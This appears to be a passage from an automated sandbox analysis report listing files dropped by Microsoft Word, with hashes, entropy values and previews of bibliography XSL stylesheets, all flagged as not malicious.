                                                                                                                                                        SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1091485
                                                                                                                                                        Entropy (8bit):7.906659368807194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:oBpmCkw3Tg/euEB+UdoC4k7ytHkHA6B/puqW2MIkTeSBmKrZHQ:MR3c/AseydwppC7veSBmWHQ
                                                                                                                                                        MD5:2192871A20313BEC581B277E405C6322
                                                                                                                                                        SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                                                                                                                        SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                                                                                                                        SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):608122
                                                                                                                                                        Entropy (8bit):7.729143855239127
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                        MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                        SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                        SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                        SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5783
                                                                                                                                                        Entropy (8bit):7.88616857639663
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:CDG4D+8VsXzXc2zLXTJ2XFY47pk2G7HVlwFzTXNbMfmn2ivLZcreFWw5fc9ADdZm:CDG4DRGY23l2Xu47GL7YtT9V29yWvWdk
                                                                                                                                                        MD5:8109B3C170E6C2C114164B8947F88AA1
                                                                                                                                                        SHA1:FC63956575842219443F4B4C07A8127FBD804C84
                                                                                                                                                        SHA-256:F320B4BB4E57825AA4A40E5A61C1C0189D808B3EACE072B35C77F38745A4C416
                                                                                                                                                        SHA-512:F8A8D7A6469CD3E7C31F3335DDCC349AD7A686730E1866F130EE36AA9994C52A01545CE73D60B642FFE0EE49972435D183D8CD041F2BB006A6CAF31BAF4924AC
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4026
                                                                                                                                                        Entropy (8bit):7.809492693601857
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4243
                                                                                                                                                        Entropy (8bit):7.824383764848892
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                                                                                                                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                                                                                                                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                                                                                                                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                                                                                                                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):16806
                                                                                                                                                        Entropy (8bit):7.9519793977093505
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                        MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                        SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                        SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                        SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):11380
                                                                                                                                                        Entropy (8bit):7.891971054886943
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                        MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                        SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                        SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                        SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6024
                                                                                                                                                        Entropy (8bit):7.886254023824049
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):9191
                                                                                                                                                        Entropy (8bit):7.93263830735235
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4326
                                                                                                                                                        Entropy (8bit):7.821066198539098
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):7370
                                                                                                                                                        Entropy (8bit):7.9204386289679745
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5596
                                                                                                                                                        Entropy (8bit):7.875182123405584
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                        MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3683
                                                                                                                                                        Entropy (8bit):7.772039166640107
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4888
                                                                                                                                                        Entropy (8bit):7.8636569313247335
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6448
                                                                                                                                                        Entropy (8bit):7.897260397307811
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                        MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5630
                                                                                                                                                        Entropy (8bit):7.87271654296772
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                                                                                                                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                                                                                                                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                                                                                                                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                                                                                                                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6193
                                                                                                                                                        Entropy (8bit):7.855499268199703
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):3075
                                                                                                                                                        Entropy (8bit):7.716021191059687
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5151
                                                                                                                                                        Entropy (8bit):7.859615916913808
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):333258
                                                                                                                                                        Entropy (8bit):4.654450340871081
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):296658
                                                                                                                                                        Entropy (8bit):5.000002997029767
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):268317
                                                                                                                                                        Entropy (8bit):5.05419861997223
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):255948
                                                                                                                                                        Entropy (8bit):5.103631650117028
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):251032
                                                                                                                                                        Entropy (8bit):5.102652100491927
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):284415
                                                                                                                                                        Entropy (8bit):5.00549404077789
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):294178
                                                                                                                                                        Entropy (8bit):4.977758311135714
                                                                                                                                                        Encrypted:false
                                                                                                                                                        Malicious:false
